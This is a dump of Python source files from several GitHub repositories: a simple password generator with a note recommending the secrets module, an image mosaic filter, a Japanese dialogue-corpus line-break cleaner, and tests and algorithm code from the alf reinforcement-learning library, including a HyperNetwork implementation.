metadata | text
---|---|
{
"source": "1ndy/password_generator",
"score": 3
} |
#### File: 1ndy/password_generator/PasswordGenerator.py
```python
import math
import random
import sys
num_passwords = 1
length = 15
if len(sys.argv) >= 2:
num_passwords = sys.argv[1]
if len(sys.argv) >= 3:
length = sys.argv[2]
num_passwords = int(num_passwords)
length = int(length)
chars_l = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
chars_u = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
syms = ['`','~','!','@','#','$','%','^','&','*','(',')','-','_','=','+','[',']','{','}','|',';',':','<','.','>','/','?']
nums = [0,1,2,3,4,5,6,7,8,9]
chars = [chars_l, chars_u, nums, syms]
passwords = []
final = ""
def select_random():
    # Pick a random character group, then a random character from that group.
    group = random.randint(0, len(chars) - 1)
    index = random.randint(0, len(chars[group]) - 1)
    return chars[group][index]
for x in range(num_passwords):
    for i in range(length):
        final = final + str(select_random())
    passwords.append(final)
    final = ""
for password in passwords:
    print(password)
``` |
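For real-world use, the standard-library `secrets` module is generally preferred over `random` for password generation, since it draws from the OS CSPRNG. Below is a minimal, self-contained sketch (not part of the original script); the flattened character pool simply mirrors the four groups defined above.

```python
import secrets
import string

# Character pool mirroring the four groups above (lowercase, uppercase, digits, symbols).
POOL = string.ascii_letters + string.digits + "`~!@#$%^&*()-_=+[]{}|;:<.>/?"

def generate_password(length=15):
    # secrets.choice selects uniformly using the operating system's entropy source.
    return "".join(secrets.choice(POOL) for _ in range(length))

if __name__ == "__main__":
    print(generate_password(20))
```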
{
"source": "1Ne4/IDE",
"score": 3
} |
#### File: 1Ne4/IDE/old_filter.py
```python
import sys
from PIL import Image
import numpy as np
class Mosaica:
def __init__(self, imageName, mosaic_size, mosaic_gradation):
try:
self.image = Image.open(imageName)
except FileNotFoundError:
            print('Error: image file not found')
            sys.exit()
        self.img_array = np.array(self.image)
        self.img_height = self.img_array.shape[0]
        self.img_width = self.img_array.shape[1]
        self.mosaic_size = mosaic_size
        self.gradation = mosaic_gradation
    def mosaic(self):
for height in range(0, self.img_height, self.mosaic_size):
for width in range(0, self.img_width, self.mosaic_size):
avg_brightness = self.get_brightness(height, width)
self.modify_img_array(avg_brightness, height, width, self.mosaic_size, self.gradation)
res = Image.fromarray(self.img_array)
return res
def get_brightness(self, height, width):
avg_brightness = self.img_array[height: height + self.mosaic_size, width:width + self.mosaic_size].sum()
return int(avg_brightness // self.mosaic_size ** 2)
def modify_img_array(self, avg_brightness, height, width, mosaic_modifier, mosaic_step):
self.img_array[height: height + mosaic_modifier, width:width + mosaic_modifier] = int(
(avg_brightness // mosaic_step) * mosaic_step) / 3
result = Mosaica(input(),10, 50).mosaic()
result.save('res.jpg')
``` |
{
"source": "1never/open2ch-dialogue-corpus",
"score": 3
} |
#### File: 1never/open2ch-dialogue-corpus/replace_br.py
```python
import MeCab
import re
import argparse
mecab = MeCab.Tagger()
mecab.parse('')
symbols = ["w", "w", "。", "、", ",", ".", ",", ".", ")", ")", "?", "!", "?", "!", "…", "」"]
def last_word_pos(text):
node = mecab.parseToNode(text)
pos = None
while node:
if "BOS" not in node.feature:
pos = node.feature
node = node.next
return pos
def replace_br(line):
    # Remove leading line-break markers at the start of each tab-separated segment
tmp = ""
for l in line.split("\t"):
tmp += re.sub(r'^( )+(__BR__ )+', '', l) + "\t"
line = re.sub(r'\t$', "", tmp)
if "__BR__" not in line:
return line
else:
        # If three line-break markers appear in a row, collapse them to two
line = line.replace(" __BR__ __BR__ __BR__ ", " __BR__ __BR__ ")
        # For two consecutive line-break markers: drop them if the preceding segment already ends with a symbol, otherwise replace them with a full stop (。)
if " __BR__ __BR__ " in line:
tmp_line = ""
ls = line.split(" __BR__ __BR__ ")
for i in range(len(ls)-1):
l = ls[i]
contains_symbol = False
for s in symbols:
if l.endswith(s):
contains_symbol = True
if contains_symbol:
tmp_line += l
else:
tmp_line += l + "。"
tmp_line += ls[-1]
line = tmp_line
        # For a remaining single line-break marker: drop it if the preceding segment ends with a symbol.
        # Otherwise, if the last word is a binding (係助詞), case (格助詞), or conjunctive (接続助詞) particle, replace it with a comma (、); else use a full stop (。).
if " __BR__ " in line:
tmp_line = ""
ls = line.split(" __BR__ ")
for i in range(len(ls)-1):
l = ls[i]
contains_symbol = False
for s in symbols:
if l.endswith(s):
contains_symbol = True
if contains_symbol:
tmp_line += l
else:
                    lwpos = last_word_pos(l)
                    if lwpos is not None and ("係助詞" in lwpos or "格助詞" in lwpos or "接続助詞" in lwpos):
tmp_line += l + "、"
else:
tmp_line += l + "。"
tmp_line += ls[-1]
line = tmp_line
return line
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--input_file", default=None, type=str, required=True,
help="The input tsv file.")
parser.add_argument("--output_file", default=None, type=str, required=True,
help="The output tsv file.")
args = parser.parse_args()
nobr_lines = []
with open(args.input_file) as f:
for l in f:
l = l.strip()
nobr_lines.append(replace_br(l) + "\n")
w = open(args.output_file, "w")
w.writelines(nobr_lines)
w.close()
if __name__ == '__main__':
main()
``` |
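A hypothetical illustration (not part of the corpus tooling) of what `replace_br` does to a single utterance. It assumes the module above is importable as `replace_br` and that MeCab is installed with a Japanese dictionary; the particle-based comma/period decisions depend on that dictionary.

```python
# Hypothetical usage sketch for the replace_br module above.
from replace_br import replace_br

sample = "そうなんだ __BR__ __BR__ ありがとう __BR__ また明日"
print(replace_br(sample))
# With a standard dictionary this typically yields something like:
#   そうなんだ。ありがとう。また明日
```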
{
"source": "1nF0rmed/alf",
"score": 2
} |
#### File: alf/algorithms/entropy_target_algorithm_test.py
```python
from absl.testing import parameterized
import torch
import torch.nn as nn
import alf
from alf.algorithms.entropy_target_algorithm import EntropyTargetAlgorithm, EntropyTargetInfo
from alf.data_structures import TimeStep, StepType
from alf.networks import NormalProjectionNetwork, StableNormalProjectionNetwork
from alf.tensor_specs import BoundedTensorSpec, TensorSpec
class EntropyTargetAlgorithmTest(parameterized.TestCase, alf.test.TestCase):
def setUp(self):
self._input_tensor_spec = TensorSpec((10, ))
self._time_step = TimeStep(
step_type=torch.as_tensor(StepType.MID),
reward=0,
discount=1,
observation=self._input_tensor_spec.zeros(outer_dims=(1, )),
prev_action=None,
env_id=None)
self._hidden_size = 100
@parameterized.parameters((NormalProjectionNetwork, False),
(NormalProjectionNetwork, True),
(StableNormalProjectionNetwork, False),
(StableNormalProjectionNetwork, True))
def test_run_entropy_target_algorithm(self, network_ctor, scaled):
action_spec = BoundedTensorSpec((1, ), minimum=0, maximum=3)
alg = EntropyTargetAlgorithm(action_spec=action_spec)
net = network_ctor(
self._input_tensor_spec.shape[0],
action_spec,
projection_output_init_gain=1.0,
squash_mean=True,
scale_distribution=scaled)
embedding = 10 * torch.rand(
(100, ) + self._input_tensor_spec.shape, dtype=torch.float32)
dist, _ = net(embedding)
alg_step = alg.train_step(dist, self._time_step.step_type)
info = EntropyTargetInfo(loss=alg_step.info.loss)
for i in range(-3, 1):
alg._stage = torch.tensor(i, dtype=torch.int32)
alg.calc_loss(self._time_step, info)
if __name__ == "__main__":
alf.test.main()
```
#### File: alf/algorithms/hypernetwork_algorithm.py
```python
from absl import logging
import functools
import gin
import numpy as np
import torch
import torch.nn.functional as F
from typing import Callable
import alf
from alf.algorithms.algorithm import Algorithm
from alf.algorithms.config import TrainerConfig
from alf.data_structures import AlgStep, LossInfo, namedtuple
from alf.algorithms.generator import Generator
from alf.algorithms.hypernetwork_networks import ParamNetwork
from alf.networks import EncodingNetwork
from alf.tensor_specs import TensorSpec
from alf.utils import common, math_ops, summary_utils
from alf.utils.summary_utils import record_time
HyperNetworkLossInfo = namedtuple("HyperNetworkLossInfo", ["loss", "extra"])
def classification_loss(output, target):
pred = output.max(-1)[1]
acc = pred.eq(target).float().mean(0)
avg_acc = acc.mean()
loss = F.cross_entropy(output.transpose(1, 2), target)
return HyperNetworkLossInfo(loss=loss, extra=avg_acc)
def regression_loss(output, target):
out_shape = output.shape[-1]
assert (target.shape[-1] == out_shape), (
"feature dimension of output and target does not match.")
loss = 0.5 * F.mse_loss(
output.reshape(-1, out_shape),
target.reshape(-1, out_shape),
reduction='sum')
return HyperNetworkLossInfo(loss=loss, extra=())
@gin.configurable
class HyperNetwork(Algorithm):
"""HyperNetwork
HyperNetwork algorithm maintains a generator that generates a set of
parameters for a predefined neural network from a random noise input.
It is based on the following work:
https://github.com/neale/HyperGAN
Ratzlaff and Fuxin. "HyperGAN: A Generative Model for Diverse,
Performant Neural Networks." International Conference on Machine Learning. 2019.
Major differences versus the original paper are:
* A single generator that generates parameters for all network layers.
* Remove the mixer and the discriminator.
    * The generator is trained with amortized particle-based variational
      inference (ParVI) methods; please refer to generator.py for details.
"""
def __init__(self,
input_tensor_spec,
conv_layer_params=None,
fc_layer_params=None,
activation=torch.relu_,
last_layer_param=None,
last_activation=None,
noise_dim=32,
hidden_layers=(64, 64),
use_fc_bn=False,
num_particles=10,
entropy_regularization=1.,
loss_type="classification",
voting="soft",
par_vi="svgd",
optimizer=None,
logging_network=False,
logging_training=False,
logging_evaluate=False,
config: TrainerConfig = None,
name="HyperNetwork"):
"""
Args:
Args for the generated parametric network
====================================================================
input_tensor_spec (nested TensorSpec): the (nested) tensor spec of
the input. If nested, then ``preprocessing_combiner`` must not be
None.
conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format
``(filters, kernel_size, strides, padding, pooling_kernel)``,
where ``padding`` and ``pooling_kernel`` are optional.
fc_layer_params (tuple[tuple]): a tuple of tuples where each tuple
                takes a format ``(FC layer sizes, use_bias)``, where
``use_bias`` is optional.
activation (nn.functional): activation used for all the layers but
the last layer.
last_layer_param (tuple): an optional tuple of the format
``(size, use_bias)``, where ``use_bias`` is optional,
it appends an additional layer at the very end.
Note that if ``last_activation`` is specified,
``last_layer_param`` has to be specified explicitly.
last_activation (nn.functional): activation function of the
additional layer specified by ``last_layer_param``. Note that if
``last_layer_param`` is not None, ``last_activation`` has to be
specified explicitly.
Args for the generator
====================================================================
noise_dim (int): dimension of noise
hidden_layers (tuple): size of hidden layers.
            use_fc_bn (bool): whether to use batch normalization for fc layers.
num_particles (int): number of sampling particles
entropy_regularization (float): weight of entropy regularization
Args for training and testing
====================================================================
loss_type (str): loglikelihood type for the generated functions,
types are [``classification``, ``regression``]
voting (str): types of voting results from sampled functions,
types are [``soft``, ``hard``]
par_vi (str): types of particle-based methods for variational inference,
types are [``svgd``, ``svgd2``, ``svgd3``, ``gfsf``]
optimizer (torch.optim.Optimizer): The optimizer for training.
            logging_network (bool): whether to log the architectures of the networks.
            logging_training (bool): whether to log loss and accuracy during training.
            logging_evaluate (bool): whether to log loss and accuracy during evaluation.
config (TrainerConfig): configuration for training
name (str):
"""
super().__init__(train_state_spec=(), optimizer=optimizer, name=name)
param_net = ParamNetwork(
input_tensor_spec=input_tensor_spec,
conv_layer_params=conv_layer_params,
fc_layer_params=fc_layer_params,
activation=activation,
last_layer_param=last_layer_param,
last_activation=last_activation)
gen_output_dim = param_net.param_length
noise_spec = TensorSpec(shape=(noise_dim, ))
net = EncodingNetwork(
noise_spec,
fc_layer_params=hidden_layers,
use_fc_bn=use_fc_bn,
last_layer_size=gen_output_dim,
last_activation=math_ops.identity,
name="Generator")
if logging_network:
logging.info("Generated network")
logging.info("-" * 68)
logging.info(param_net)
logging.info("Generator network")
logging.info("-" * 68)
logging.info(net)
if par_vi == 'svgd':
par_vi = 'svgd3'
self._generator = Generator(
gen_output_dim,
noise_dim=noise_dim,
net=net,
entropy_regularization=entropy_regularization,
par_vi=par_vi,
optimizer=None,
name=name)
self._param_net = param_net
self._num_particles = num_particles
self._entropy_regularization = entropy_regularization
self._train_loader = None
self._test_loader = None
self._use_fc_bn = use_fc_bn
self._loss_type = loss_type
self._logging_training = logging_training
self._logging_evaluate = logging_evaluate
self._config = config
assert (voting in ['soft',
'hard']), ('voting only supports "soft" and "hard"')
self._voting = voting
if loss_type == 'classification':
self._loss_func = classification_loss
self._vote = self._classification_vote
elif loss_type == 'regression':
self._loss_func = regression_loss
self._vote = self._regression_vote
else:
raise ValueError("Unsupported loss_type: %s" % loss_type)
    def set_data_loader(self, train_loader, test_loader=None):
        """Set data loaders for training and testing.
Args:
train_loader (torch.utils.data.DataLoader): training data loader
test_loader (torch.utils.data.DataLoader): testing data loader
"""
self._train_loader = train_loader
self._test_loader = test_loader
self._entropy_regularization = 1 / len(train_loader)
def set_num_particles(self, num_particles):
"""Set the number of particles to sample through one forward
pass of the hypernetwork. """
self._num_particles = num_particles
@property
def num_particles(self):
"""number of sampled particles. """
return self._num_particles
def sample_parameters(self, noise=None, num_particles=None, training=True):
"""Sample parameters for an ensemble of networks.
Args:
noise (Tensor): input noise to self._generator. Default is None.
num_particles (int): number of sampled particles. Default is None.
If both noise and num_particles are None, num_particles
provided to the constructor will be used as batch_size for
self._generator.
training (bool): whether or not training self._generator
Returns:
AlgStep.output from predict_step of self._generator
"""
if noise is None and num_particles is None:
num_particles = self.num_particles
generator_step = self._generator.predict_step(
noise=noise, batch_size=num_particles, training=training)
return generator_step.output
def predict_step(self, inputs, params=None, num_particles=None,
state=None):
"""Predict ensemble outputs for inputs using the hypernetwork model.
Args:
inputs (Tensor): inputs to the ensemble of networks.
params (Tensor): parameters of the ensemble of networks,
if None, will resample.
num_particles (int): size of sampled ensemble. Default is None.
state: not used.
Returns:
AlgStep: outputs with shape (batch_size, self._param_net._output_spec.shape[0])
"""
if params is None:
params = self.sample_parameters(num_particles=num_particles)
self._param_net.set_parameters(params)
outputs, _ = self._param_net(inputs)
return AlgStep(output=outputs, state=(), info=())
def train_iter(self, num_particles=None, state=None):
"""Perform one epoch (iteration) of training.
Args:
num_particles (int): number of sampled particles. Default is None.
state: not used
Return:
mini_batch number
"""
assert self._train_loader is not None, "Must set data_loader first."
alf.summary.increment_global_counter()
with record_time("time/train"):
loss = 0.
if self._loss_type == 'classification':
avg_acc = []
for batch_idx, (data, target) in enumerate(self._train_loader):
data = data.to(alf.get_default_device())
target = target.to(alf.get_default_device())
alg_step = self.train_step((data, target),
num_particles=num_particles,
state=state)
loss_info, params = self.update_with_gradient(alg_step.info)
loss += loss_info.extra.generator.loss
if self._loss_type == 'classification':
avg_acc.append(alg_step.info.extra.generator.extra)
acc = None
if self._loss_type == 'classification':
acc = torch.as_tensor(avg_acc).mean() * 100
if self._logging_training:
if self._loss_type == 'classification':
logging.info("Avg acc: {}".format(acc))
logging.info("Cum loss: {}".format(loss))
self.summarize_train(loss_info, params, cum_loss=loss, avg_acc=acc)
return batch_idx + 1
def train_step(self,
inputs,
num_particles=None,
entropy_regularization=None,
state=None):
"""Perform one batch of training computation.
Args:
inputs (nested Tensor): input training data.
num_particles (int): number of sampled particles. Default is None,
in which case self._num_particles will be used for batch_size
of self._generator.
state: not used
Returns:
AlgStep:
outputs: Tensor with shape (batch_size, dim)
info: LossInfo
"""
if num_particles is None:
num_particles = self._num_particles
if entropy_regularization is None:
entropy_regularization = self._entropy_regularization
return self._generator.train_step(
inputs=None,
loss_func=functools.partial(self._neglogprob, inputs),
batch_size=num_particles,
entropy_regularization=entropy_regularization,
state=())
def evaluate(self, num_particles=None):
"""Evaluate on a randomly drawn ensemble.
Args:
num_particles (int): number of sampled particles. Default is None.
"""
assert self._test_loader is not None, "Must set test_loader first."
logging.info("==> Begin testing")
if self._use_fc_bn:
self._generator.eval()
params = self.sample_parameters(num_particles=num_particles)
self._param_net.set_parameters(params)
if self._use_fc_bn:
self._generator.train()
with record_time("time/test"):
if self._loss_type == 'classification':
test_acc = 0.
test_loss = 0.
for i, (data, target) in enumerate(self._test_loader):
data = data.to(alf.get_default_device())
target = target.to(alf.get_default_device())
output, _ = self._param_net(data) # [B, N, D]
loss, extra = self._vote(output, target)
if self._loss_type == 'classification':
test_acc += extra.item()
test_loss += loss.loss.item()
if self._loss_type == 'classification':
test_acc /= len(self._test_loader.dataset)
alf.summary.scalar(name='eval/test_acc', data=test_acc * 100)
if self._logging_evaluate:
if self._loss_type == 'classification':
logging.info("Test acc: {}".format(test_acc * 100))
logging.info("Test loss: {}".format(test_loss))
alf.summary.scalar(name='eval/test_loss', data=test_loss)
def _neglogprob(self, inputs, params):
self._param_net.set_parameters(params)
num_particles = params.shape[0]
data, target = inputs
output, _ = self._param_net(data) # [B, N, D]
target = target.unsqueeze(1).expand(*target.shape[:1], num_particles,
*target.shape[1:])
return self._loss_func(output, target)
    def _classification_vote(self, output, target):
        """Ensemble the outputs from sampled classifiers."""
num_particles = output.shape[1]
probs = F.softmax(output, dim=-1) # [B, N, D]
if self._voting == 'soft':
pred = probs.mean(1).cpu() # [B, D]
vote = pred.argmax(-1)
elif self._voting == 'hard':
pred = probs.argmax(-1).cpu() # [B, N, 1]
vote = []
for i in range(pred.shape[0]):
values, counts = torch.unique(
pred[i], sorted=False, return_counts=True)
modes = (counts == counts.max()).nonzero()
label = values[torch.randint(len(modes), (1, ))]
vote.append(label)
vote = torch.as_tensor(vote, device='cpu')
correct = vote.eq(target.cpu().view_as(vote)).float().cpu().sum()
target = target.unsqueeze(1).expand(*target.shape[:1], num_particles,
*target.shape[1:])
loss = classification_loss(output, target)
return loss, correct
    def _regression_vote(self, output, target):
        """Ensemble the outputs from sampled regressors."""
num_particles = output.shape[1]
pred = output.mean(1) # [B, D]
loss = regression_loss(pred, target)
target = target.unsqueeze(1).expand(*target.shape[:1], num_particles,
*target.shape[1:])
total_loss = regression_loss(output, target)
return loss, total_loss
    def summarize_train(self, loss_info, params, cum_loss=None, avg_acc=None):
        """Generate summaries for training & loss info after each gradient update.
        The default implementation of this function only summarizes params
        (with grads) and the loss. An algorithm can override this for additional
        summaries. See ``RLAlgorithm.summarize_train()`` for an example.
        Args:
            loss_info (LossInfo): loss info from the most recent
                ``update_with_gradient()``.
            params (list[Parameter]): list of parameters with gradients
            cum_loss (float): cumulative training loss of the epoch, summarized
                as ``train_epoch/neglogprob`` if provided.
            avg_acc (float): average training accuracy of the epoch, summarized
                as ``train_epoch/avg_acc`` if provided.
        """
if self._config.summarize_grads_and_vars:
summary_utils.summarize_variables(params)
summary_utils.summarize_gradients(params)
if self._config.debug_summaries:
summary_utils.summarize_loss(loss_info)
if cum_loss is not None:
alf.summary.scalar(name='train_epoch/neglogprob', data=cum_loss)
if avg_acc is not None:
alf.summary.scalar(name='train_epoch/avg_acc', data=avg_acc)
```
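The constructor and the training/evaluation methods above suggest the following usage pattern. This is only a sketch built from the signatures in this file: the 784-dimensional flattened input, the layer sizes, and the (commented-out) torch `DataLoader`s are assumptions, not code from the repository.

```python
# Hypothetical usage sketch for HyperNetwork; all concrete sizes are assumptions.
from alf.algorithms.hypernetwork_algorithm import HyperNetwork
from alf.tensor_specs import TensorSpec
from alf.utils import math_ops

algo = HyperNetwork(
    input_tensor_spec=TensorSpec((784, )),  # e.g. flattened 28x28 images (assumed)
    fc_layer_params=((256, True), ),        # one hidden FC layer: (size, use_bias)
    last_layer_param=(10, True),            # 10-way classification head
    last_activation=math_ops.identity,      # raw logits, matching F.cross_entropy above
    noise_dim=32,
    num_particles=8,
    loss_type="classification")

# train_loader / test_loader would be ordinary torch DataLoaders over (data, target):
# algo.set_data_loader(train_loader, test_loader)
# for _ in range(num_epochs):
#     algo.train_iter()   # one pass over train_loader
# algo.evaluate()         # ensemble voting on test_loader
```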
#### File: alf/algorithms/rl_algorithm_test.py
```python
import tempfile
import torch
import torch.distributions as td
import unittest
import alf
from alf.utils import common, dist_utils, tensor_utils
from alf.data_structures import AlgStep, Experience, LossInfo, StepType, TimeStep
from alf.algorithms.on_policy_algorithm import OnPolicyAlgorithm
from alf.algorithms.config import TrainerConfig
class MyAlg(OnPolicyAlgorithm):
def __init__(self,
observation_spec,
action_spec,
env=None,
config=None,
on_policy=True,
debug_summaries=False):
self._on_policy = on_policy
super().__init__(
observation_spec=observation_spec,
action_spec=action_spec,
train_state_spec=observation_spec,
env=env,
config=config,
optimizer=alf.optimizers.Adam(lr=1e-1),
debug_summaries=debug_summaries,
name="MyAlg")
self._proj_net = alf.networks.CategoricalProjectionNetwork(
input_size=2, action_spec=action_spec)
def is_on_policy(self):
return self._on_policy
def predict_step(self, time_step: TimeStep, state, epsilon_greedy):
dist, _ = self._proj_net(time_step.observation)
return AlgStep(output=dist.sample(), state=(), info=())
def rollout_step(self, time_step: TimeStep, state):
dist, _ = self._proj_net(time_step.observation)
return AlgStep(
output=dist.sample(), state=time_step.observation, info=dist)
def train_step(self, exp: Experience, state):
dist, _ = self._proj_net(exp.observation)
return AlgStep(output=dist.sample(), state=exp.observation, info=dist)
def calc_loss(self, experience, train_info: td.Distribution):
dist: td.Distribution = train_info
log_prob = dist.log_prob(experience.action)
loss = -log_prob[:-1] * experience.reward[1:]
loss = tensor_utils.tensor_extend_zero(loss)
return LossInfo(loss=loss)
#TODO: move this to environments.suite_unittest
class MyEnv(object):
"""A simple environment for unittesting algorithms.
At each step, each episode ends with probability 0.2 (independently among
the batch). Reward depends only on the action. Action 0 gets reward 0.5,
action 1 gets 1.0, action 2 gets reward -1.
"""
def __init__(self, batch_size, obs_shape=(2, )):
super().__init__()
self._batch_size = batch_size
self._rewards = torch.tensor([0.5, 1.0, -1.])
self._observation_spec = alf.TensorSpec(obs_shape, dtype='float32')
self._action_spec = alf.BoundedTensorSpec(
shape=(), dtype='int64', minimum=0, maximum=2)
self.reset()
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._action_spec
def reward_spec(self):
return alf.TensorSpec(())
def reset(self):
self._prev_action = torch.zeros(self._batch_size, dtype=torch.int64)
self._current_time_step = TimeStep(
observation=self._observation_spec.randn([self._batch_size]),
step_type=torch.full([self._batch_size],
StepType.FIRST,
dtype=torch.int32),
reward=torch.zeros(self._batch_size),
discount=torch.zeros(self._batch_size),
prev_action=self._prev_action,
env_id=torch.arange(self._batch_size, dtype=torch.int32))
return self._current_time_step
def close(self):
pass
@property
def batch_size(self):
return self._batch_size
def step(self, action):
prev_step_type = self._current_time_step.step_type
is_first = prev_step_type == StepType.FIRST
is_mid = prev_step_type == StepType.MID
is_last = prev_step_type == StepType.LAST
step_type = torch.where(
is_mid & (torch.rand(self._batch_size) < 0.2),
torch.full([self._batch_size], StepType.LAST, dtype=torch.int32),
torch.full([self._batch_size], StepType.MID, dtype=torch.int32))
step_type = torch.where(
is_last,
torch.full([self._batch_size], StepType.FIRST, dtype=torch.int32),
step_type)
step_type = torch.where(
is_first,
torch.full([self._batch_size], StepType.MID, dtype=torch.int32),
step_type)
self._current_time_step = TimeStep(
observation=self._observation_spec.randn([self._batch_size]),
step_type=step_type,
reward=self._rewards[action],
discount=torch.zeros(self._batch_size),
prev_action=self._prev_action,
env_id=torch.arange(self._batch_size, dtype=torch.int32))
self._prev_action = action
return self._current_time_step
def current_time_step(self):
return self._current_time_step
class RLAlgorithmTest(unittest.TestCase):
def test_on_policy_algorithm(self):
# root_dir is not used. We have to give it a value because
# it is a required argument of TrainerConfig.
config = TrainerConfig(
root_dir='/tmp/rl_algorithm_test', unroll_length=5, num_envs=1)
env = MyEnv(batch_size=3)
alg = MyAlg(
observation_spec=env.observation_spec(),
action_spec=env.action_spec(),
env=env,
config=config,
on_policy=True,
debug_summaries=True)
for _ in range(100):
alg.train_iter()
time_step = common.get_initial_time_step(env)
state = alg.get_initial_predict_state(env.batch_size)
policy_step = alg.rollout_step(time_step, state)
logits = policy_step.info.log_prob(torch.arange(3).reshape(3, 1))
print("logits: ", logits)
self.assertTrue(torch.all(logits[1, :] > logits[0, :]))
self.assertTrue(torch.all(logits[1, :] > logits[2, :]))
def test_off_policy_algorithm(self):
with tempfile.TemporaryDirectory() as root_dir:
common.run_under_record_context(
lambda: self._test_off_policy_algorithm(root_dir),
summary_dir=root_dir,
summary_interval=1,
flush_secs=1)
def _test_off_policy_algorithm(self, root_dir):
alf.summary.enable_summary()
config = TrainerConfig(
root_dir=root_dir,
unroll_length=5,
num_envs=1,
num_updates_per_train_iter=1,
mini_batch_length=5,
mini_batch_size=3,
use_rollout_state=True,
summarize_grads_and_vars=True,
summarize_action_distributions=True,
whole_replay_buffer_training=True)
env = MyEnv(batch_size=3)
alg = MyAlg(
observation_spec=env.observation_spec(),
action_spec=env.action_spec(),
env=env,
on_policy=False,
config=config)
for _ in range(100):
alg.train_iter()
time_step = common.get_initial_time_step(env)
state = alg.get_initial_predict_state(env.batch_size)
policy_step = alg.rollout_step(time_step, state)
logits = policy_step.info.log_prob(torch.arange(3).reshape(3, 1))
print("logits: ", logits)
self.assertTrue(torch.all(logits[1, :] > logits[0, :]))
self.assertTrue(torch.all(logits[1, :] > logits[2, :]))
if __name__ == '__main__':
unittest.main()
```
#### File: alf/environments/alf_wrappers_test.py
```python
from absl.testing import parameterized
from absl.testing.absltest import mock
import gym
import math
import torch
import numpy as np
import alf
import alf.data_structures as ds
from alf.environments import alf_environment, alf_gym_wrapper, alf_wrappers
from alf.environments.random_alf_environment import RandomAlfEnvironment
import alf.tensor_specs as ts
class AlfEnvironmentBaseWrapperTest(parameterized.TestCase):
@parameterized.named_parameters(
{
'testcase_name': 'scalar',
'batch_size': None
},
{
'testcase_name': 'batched',
'batch_size': 2
},
)
def test_batch_properties(self, batch_size):
obs_spec = ts.BoundedTensorSpec((2, 3), torch.int32, -10, 10)
action_spec = ts.BoundedTensorSpec((1, ), torch.int64, -10, 10)
env = RandomAlfEnvironment(
obs_spec,
action_spec,
reward_fn=lambda *_: torch.tensor([1.0], dtype=torch.float32),
batch_size=batch_size)
wrap_env = alf_wrappers.AlfEnvironmentBaseWrapper(env)
self.assertEqual(wrap_env.batched, env.batched)
self.assertEqual(wrap_env.batch_size, env.batch_size)
def test_default_batch_properties(self):
cartpole_env = gym.spec('CartPole-v1').make()
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
self.assertFalse(env.batched)
self.assertEqual(env.batch_size, 1)
wrap_env = alf_wrappers.AlfEnvironmentBaseWrapper(env)
self.assertEqual(wrap_env.batched, env.batched)
self.assertEqual(wrap_env.batch_size, env.batch_size)
def test_wrapped_method_propagation(self):
mock_env = mock.MagicMock()
env = alf_wrappers.AlfEnvironmentBaseWrapper(mock_env)
env.reset()
self.assertEqual(1, mock_env.reset.call_count)
action = np.array(0, dtype=np.int64)
env.step(action)
self.assertEqual(1, mock_env.step.call_count)
mock_env.step.assert_called_with(0)
env.seed(0)
self.assertEqual(1, mock_env.seed.call_count)
mock_env.seed.assert_called_with(0)
env.render()
self.assertEqual(1, mock_env.render.call_count)
env.close()
self.assertEqual(1, mock_env.close.call_count)
class TimeLimitWrapperTest(alf.test.TestCase):
def test_limit_duration_wrapped_env_forwards_calls(self):
cartpole_env = gym.spec('CartPole-v1').make()
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 10)
action_spec = env.action_spec()
self.assertEqual((), action_spec.shape)
self.assertEqual(0, action_spec.minimum)
self.assertEqual(1, action_spec.maximum)
observation_spec = env.observation_spec()
self.assertEqual((4, ), observation_spec.shape)
high = np.array([
4.8,
np.finfo(np.float32).max, 2 / 15.0 * math.pi,
np.finfo(np.float32).max
])
np.testing.assert_array_almost_equal(-high, observation_spec.minimum)
np.testing.assert_array_almost_equal(high, observation_spec.maximum)
def test_limit_duration_stops_after_duration(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 2)
env.reset()
action = np.array(0, dtype=np.int64)
env.step(action)
time_step = env.step(action)
self.assertTrue(time_step.is_last())
self.assertNotEqual(None, time_step.discount)
self.assertNotEqual(0.0, time_step.discount)
def test_extra_env_methods_work(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 2)
self.assertEqual(None, env.get_info())
env.reset()
action = np.array(0, dtype=np.int64)
env.step(action)
self.assertEqual({}, env.get_info())
def test_automatic_reset(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 2)
# Episode 1
action = np.array(0, dtype=np.int64)
first_time_step = env.step(action)
self.assertTrue(first_time_step.is_first())
mid_time_step = env.step(action)
self.assertTrue(mid_time_step.is_mid())
last_time_step = env.step(action)
self.assertTrue(last_time_step.is_last())
# Episode 2
first_time_step = env.step(action)
self.assertTrue(first_time_step.is_first())
mid_time_step = env.step(action)
self.assertTrue(mid_time_step.is_mid())
last_time_step = env.step(action)
self.assertTrue(last_time_step.is_last())
def test_duration_applied_after_episode_terminates_early(self):
cartpole_env = gym.make('CartPole-v1')
env = alf_gym_wrapper.AlfGymWrapper(cartpole_env)
env = alf_wrappers.TimeLimit(env, 10000)
# Episode 1 stepped until termination occurs.
action = np.array(1, dtype=np.int64)
time_step = env.step(action)
while not time_step.is_last():
time_step = env.step(action)
self.assertTrue(time_step.is_last())
env._duration = 2
# Episode 2 short duration hits step limit.
action = np.array(0, dtype=np.int64)
first_time_step = env.step(action)
self.assertTrue(first_time_step.is_first())
mid_time_step = env.step(action)
self.assertTrue(mid_time_step.is_mid())
last_time_step = env.step(action)
self.assertTrue(last_time_step.is_last())
if __name__ == '__main__':
alf.test.main()
```
#### File: alf/networks/value_networks.py
```python
import gin
import functools
import torch
import torch.nn as nn
from .encoding_networks import EncodingNetwork, LSTMEncodingNetwork
from .preprocessor_networks import PreprocessorNetwork
from alf.tensor_specs import TensorSpec
import alf.utils.math_ops as math_ops
@gin.configurable
class ValueNetwork(PreprocessorNetwork):
"""Output temporally uncorrelated values."""
def __init__(self,
input_tensor_spec,
